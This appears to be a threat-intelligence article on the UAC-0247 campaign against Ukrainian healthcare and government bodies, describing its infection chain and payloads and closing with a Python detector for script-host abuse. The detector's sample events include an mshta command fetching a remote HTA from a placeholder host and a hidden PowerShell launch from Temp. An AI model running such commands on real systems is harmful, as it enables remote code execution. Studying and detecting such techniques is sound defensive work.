Ukrainian Healthcare and Government Institutions Targeted by Sophisticated UAC-0247 Malware Campaign Delivering Data-Stealing AGINGFLY Payloads

The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a comprehensive advisory regarding a newly identified cyberespionage campaign targeting the nation’s critical infrastructure. This activity, attributed to a threat cluster designated as UAC-0247, has specifically focused on government agencies and municipal healthcare institutions, including emergency hospitals and clinics. The campaign, which was active throughout March and April 2026, utilizes a complex multi-stage infection chain designed to exfiltrate sensitive user data from Chromium-based web browsers and the WhatsApp messaging platform. While the precise geographic origin of UAC-0247 remains unconfirmed, the sophistication of the tools and the specific nature of the targets suggest a high level of coordination and a clear strategic objective.
The emergence of this campaign underscores the persistent and evolving nature of the cyber threats facing Ukraine’s public sector. Since 2022, Ukrainian institutions have been subjected to a relentless barrage of digital incursions, often coinciding with physical kinetic operations. However, the UAC-0247 campaign is notable for its use of modern techniques, including the leveraging of artificial intelligence (AI) to generate convincing social engineering content and the deployment of proprietary malware formats to evade traditional signature-based detection systems.
The Infection Vector: Social Engineering and AI Integration
The UAC-0247 campaign begins with highly targeted phishing emails. These messages are crafted to exploit the humanitarian crisis in the region, often masquerading as official proposals for humanitarian aid or medical support. By using themes that evoke urgency and altruism, the attackers significantly increase the likelihood that recipients will engage with the malicious content.
Within these emails is a link that directs the victim to a landing page. CERT-UA’s investigation revealed two distinct methods used to host these pages. In some instances, the threat actors exploited cross-site scripting (XSS) vulnerabilities on legitimate, pre-existing websites to inject their own malicious redirects. In other cases, they utilized AI-driven tools to create entirely new, highly professional-looking websites from scratch. These AI-generated sites are designed to mimic the appearance of legitimate NGOs or government portals, making it difficult for even vigilant users to distinguish them from authentic sources.
The ultimate goal of the landing page is to trick the user into downloading a Windows Shortcut (LNK) file. This file acts as the initial trigger for the subsequent stages of the infection. When the user executes the LNK file, it invokes a native Windows utility, "mshta.exe," to run a remote HTML Application (HTA). This "Living off the Land" (LotL) technique is a common strategy among advanced persistent threat (APT) groups, as it uses legitimate system tools to execute malicious code, thereby bypassing many security filters that focus on unrecognized executable files.
Technical Analysis of the Multi-Stage Execution Chain
The execution of the HTA file marks the transition from social engineering to technical exploitation. To keep the victim unaware of the background activity, the HTA file displays a decoy form—such as a fake registration document for humanitarian assistance. While the user is distracted by this form, the HTA script silently fetches a binary payload from a remote server.
This binary is responsible for injecting shellcode into a legitimate system process, frequently "RuntimeBroker.exe." This process injection is a critical step in maintaining stealth, as it allows the malware to operate under the guise of a trusted Windows process. CERT-UA observed that recent iterations of this campaign have become even more complex, utilizing a two-stage loader. The second stage of this loader is implemented using a proprietary executable file format that supports custom code and data sections, function imports from dynamic libraries, and relocation tables. This level of customization suggests that the developers behind UAC-0247 are well-resourced and capable of creating bespoke tools to bypass standard antivirus and EDR (Endpoint Detection and Response) solutions.

The final payloads delivered through this chain are compressed and encrypted, further complicating the task of forensic analysis and detection. Once the environment is prepared, the attackers deploy a suite of specialized tools, including RAVENSHELL, SILENTLOOP, and the primary backdoor, AGINGFLY.
Payload Deep Dive: RAVENSHELL, SILENTLOOP, and AGINGFLY
The UAC-0247 toolkit is designed for both immediate tactical control and long-term intelligence gathering.
RAVENSHELL: This tool functions as a TCP reverse shell. Once active, it establishes a persistent connection with the attacker’s command-and-control (C2) server. This provides the threat actors with a direct line to the infected host’s command line interface (cmd.exe), allowing them to execute arbitrary commands, navigate the file system, and perform initial reconnaissance of the local network.
SILENTLOOP: This is a sophisticated PowerShell script designed to automate several key aspects of the malware’s lifecycle. SILENTLOOP includes functions for executing commands, updating its own configuration, and dynamically obtaining the current IP address of the C2 server. Interestingly, the script is programmed to check a specific Telegram channel for C2 updates—a technique known as "dead drop resolving." If Telegram is inaccessible, the script falls back to alternative mechanisms to ensure it remains in contact with the attackers.
AGINGFLY: The centerpiece of the campaign is AGINGFLY, a remote access Trojan (RAT) developed in C#. AGINGFLY uses WebSockets for communication, providing a full-featured interface for remote system management. Its capabilities include:
- Executing remote commands and scripts.
- Deploying and managing a keylogger to capture sensitive keystrokes.
- Uploading and downloading files between the host and the C2 server.
- Launching additional payloads or modules as needed for specific mission objectives.
Targeting Healthcare and Defense Sectors
The targeting of municipal healthcare institutions, particularly emergency hospitals, is a troubling aspect of the UAC-0247 campaign. In a conflict environment, the integrity of healthcare data and the availability of emergency services are paramount. By compromising these systems, attackers gain access to sensitive patient records, staff credentials, and internal communications, which can be used for further exploitation or to cause operational disruption.
Furthermore, CERT-UA has identified evidence suggesting that the campaign has extended its reach to the Defense Forces of Ukraine. In these instances, the delivery mechanism shifts slightly, utilizing the Signal messaging app to distribute malicious ZIP archives. These archives are designed to drop the AGINGFLY malware using a technique known as DLL side-loading. By placing a malicious DLL in the same directory as a legitimate executable, the malware can trick the system into loading the malicious code instead of the intended library.
The focus on both healthcare and defense suggests that UAC-0247 is interested in a broad spectrum of intelligence, ranging from the logistical capabilities of municipal services to the operational movements of military personnel.

Chronology of the Campaign
The activities of UAC-0247 were closely monitored by Ukrainian authorities over a two-month window:
- Early March 2026: Initial sightings of the "humanitarian aid" phishing emails. The first wave of attacks primarily targeted municipal clinics in eastern and central Ukraine.
- Mid-March 2026: Discovery of AI-generated landing pages. Analysts noted a marked improvement in the linguistic quality and visual design of the phishing sites compared to previous campaigns.
- Late March 2026: Identification of the proprietary two-stage loader. This marked a significant escalation in the technical complexity of the campaign.
- April 2026: The campaign expanded to include the Defense Forces via Signal. CERT-UA began observing the use of DLL side-loading to bypass endpoint security on military workstations.
- Mid-April 2026: CERT-UA issued its formal disclosure and technical advisory, providing indicators of compromise (IoCs) and mitigation strategies to the public and private sectors.
Broader Implications and Strategic Analysis
The UAC-0247 campaign is a stark reminder that the cyber domain remains a primary theater of modern conflict. The use of AI to generate phishing content represents a "democratization" of high-end social engineering, allowing threat actors to produce convincing lures at scale with minimal effort. This trend is likely to continue, making traditional user awareness training more challenging as the "red flags" of phishing become increasingly subtle.
The deployment of proprietary malware formats and the use of legitimate Windows utilities (LotL) reflect a broader shift toward "stealth-first" operations. By avoiding well-known malware families and utilizing the system’s own tools, UAC-0247 minimizes its digital footprint, allowing it to persist within a network for extended periods.
From a strategic perspective, the theft of data from Chromium-based browsers and WhatsApp is particularly damaging. These platforms often contain the "keys to the kingdom"—including saved passwords, session cookies, and private communications. With this data, attackers can move laterally through a network, accessing secondary systems without needing to trigger further exploits.
Recommendations and Mitigation Strategies
In response to the UAC-0247 threat, CERT-UA has recommended a series of aggressive defensive measures to minimize the attack surface of Ukrainian organizations. These include:
- Restrict Script Execution: Organizations should implement policies to restrict or monitor the execution of LNK, HTA, and JS files, especially those originating from the internet or temporary directories.
- Monitor Native Utilities: Close monitoring of native Windows utilities such as mshta.exe, powershell.exe, and wscript.exe is essential. Security teams should look for unusual parent-child process relationships, such as a browser launching mshta.exe.
- Enhance Email Filtering: Deploying advanced email security solutions that can identify AI-generated text patterns and detect malicious redirects on compromised legitimate sites.
- Endpoint Protection: Utilizing EDR tools that focus on behavioral analysis rather than just file signatures. This is critical for detecting process injection and DLL side-loading.
- User Education: While phishing lures are becoming more sophisticated, employees should still be trained to verify the source of any unexpected "humanitarian" or "urgent" requests, particularly those involving file downloads or links.
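Detection logic for the execution chain described above (LNK invoking mshta.exe to run a remote HTA, and a script host spawned by a browser or from a download/temp location) and for the parent-child monitoring recommended here, as an added example that is not from the advisory or CERT-UA. The browser and script-host name lists, the event fields and the sample events are constructed assumptions; the host name in the sample URL is a placeholder, not an indicator.

```python
import re
from dataclasses import dataclass

# Process names the advisory singles out (constructed lists, not CERT-UA IoCs).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# An LNK double-clicked from a download/temp location has explorer.exe as parent.
USER_DROP_DIRS = re.compile(r"\\(Temp|INetCache|Downloads)\\", re.IGNORECASE)

@dataclass
class ProcEvent:
    """One process-creation record (e.g. Sysmon Event ID 1 fields), simplified."""
    parent_image: str
    image: str
    cmdline: str

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return alert tags for one event; an empty list means no rule matched."""
    parent, image = basename(ev.parent_image), basename(ev.image)
    tags = []
    if image in SCRIPT_HOSTS and parent in BROWSERS:
        tags.append("browser-spawned-script-host")
    if image == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        tags.append("mshta-remote-hta")          # HTA fetched from a remote server
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and USER_DROP_DIRS.search(ev.cmdline):
        tags.append("script-host-from-user-dir")  # launched out of Temp or Downloads
    return tags

def scan(events):
    hits = []
    for ev in events:
        tags = classify(ev)
        if tags:
            hits.append((basename(ev.image), tags))
    return hits

# Constructed sample events; aid-portal.invalid is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\mshta.exe", r"mshta.exe https://aid-portal.invalid/form.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -f C:\Users\u\AppData\Local\Temp\update.ps1"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]
```

Running `scan(SAMPLE_EVENTS)` flags the first two events and leaves the service-host launch untagged; in production the events would be read from Sysmon or EDR telemetry rather than the constructed list.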
The campaign attributed to UAC-0247 demonstrates that the cyber threat landscape is not static. As defensive technologies improve, threat actors are quick to integrate new tools like AI and custom-built loaders to maintain their advantage. For Ukraine and its international partners, the ongoing challenge remains the rapid identification and neutralization of these evolving threats before they can compromise the critical services upon which the civilian and military infrastructure depend.